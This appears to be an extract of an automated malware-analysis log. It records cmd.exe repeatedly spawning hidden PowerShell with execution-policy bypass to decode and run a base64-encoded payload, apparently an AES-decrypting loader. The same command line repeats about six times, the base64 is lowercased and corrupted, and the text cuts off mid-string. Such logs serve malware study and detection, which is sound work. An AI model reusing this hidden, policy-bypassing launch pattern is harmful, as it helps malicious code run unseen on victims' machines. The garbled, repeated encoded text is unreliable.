0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvb